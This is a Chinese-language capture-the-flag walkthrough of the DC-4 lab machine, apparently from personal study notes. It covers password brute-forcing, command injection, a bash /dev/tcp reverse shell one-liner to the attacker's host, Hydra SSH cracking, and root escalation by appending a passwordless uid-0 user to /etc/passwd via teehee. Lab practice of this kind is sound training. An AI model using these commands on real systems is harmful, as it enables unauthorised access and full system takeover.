小H靶场笔记：DC-4

DC-4

January 4, 2024 2:37 PM
Tags: teehee提权
Owner：只惠摸鱼

信息收集

• 探测靶机ip，发现应该是192.168.199.134

• 扫一下开放端口（22、80）、服务、版本、漏洞

• 根据扫描结果，在80端口可能有CSRF漏洞，可以尝试利用一下

  • OS为Linux3.2-4.9

• 80端口开放，那先扫一下目录吧，发现没有什么

  

漏洞利用

• 那就看一下80端口吧，打开页面瞅一眼，很简洁，没有什么提示，尝试登录也是直接重定向了。

• 那就BP抓包看一下吧，发现是POST请求，请求体有username 和 password，请求头有cookie，尝试随即登录且不发送改变。

• 尝试了万能密码没有效果，试一下爆破吧，盲猜账号为admin

  

  • 我使用了我自己的收集的一个常用字典大概7.5k
  • 字典越好爆破的越快，（我设置了线程为1，防止服务崩溃【别问我怎么知道的】）

• 爆破出了密码happy

  

• 使用admin，和happy登录，进入到页面

  

• 点击command，发现可以执行一些系统命令，抓包试试看

  

• 修改radio参数，发现可以成功执行系统命令

  

• 反弹shell给kali，方便做下一步提权操作

  • kali：nc -lvp 1234
  • 被控端：bash±c+'bash±i+>%26+/dev/tcp/192.168.199.129/1234+0>%261’
  • %26为&的url编码，不转码会和‘&’符号冲突。

  

  

• 用户为普通用户，权限太低，查看目录，翻到home目录，发现有三个用户

  

  • /home 在Linux中代表用户主目录

    

    • 对一般用户，～表示/home/（用户名）
    • 对于root用户，～表示/root

• 翻看用户目录，发现jim目录中有一个backups目录，且其中有一个密码字典

  

• 将字典复制到本地txt，直接尝试使用hydra爆破jim用户 ssh服务

  • Hydra是一款密码破解工具，可以用来破解各种网络应用程序的登录口令。 Hydra支持多种协议和服务，如FTP、SSH、Telnet、SMTP、POP3、IMAP、HTTP、LDAP、SMB等，可以使用字典攻击、暴力破解等方式进行密码破解

  

• 得到密码

  

• 登录ssh

  

• 尝试sudo -l 发现没有权限，权限太低，需要寻找其他用户

  

• 查看文件 发现有邮件，可以查看一下邮箱试试

  

  • 邮件存储位置可以因系统而异，通常在**/var/spool/mail或/var/mail**目录中

• 查看邮箱中的邮件，发现charles的密码。

  

• 通过所给的密码尝试切换用户

  

提权

• sudo -l查看无需密码的指令（类似git提权）

  

• 发现有teehee，百度了查一下teehee提权方法

  • 输入指令创建raaj用户

    • echo “raaj::0:0:::/bin/bash” | sudo teehee -a /etc/passwd

  • 直接无密码登录raaj用户，得到root权限

    

• 进入/root目录得到flag！

  

teehee提权

• teehee是linux编辑器。在有sudo权限时，可以利用其来提权
• 核心思路就是利用其在passwd文件中追加一条uid为0的用户条目
  • echo "hwhw::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
• 按照linux用户机制，如果没有shadow条目，且passwd用户密码条目为空的时候，可以本地直接su空密码登录。所以只需要执行su hwhw就可以登录到hwhw用户，这个用户因为uid为0，所以也是root权限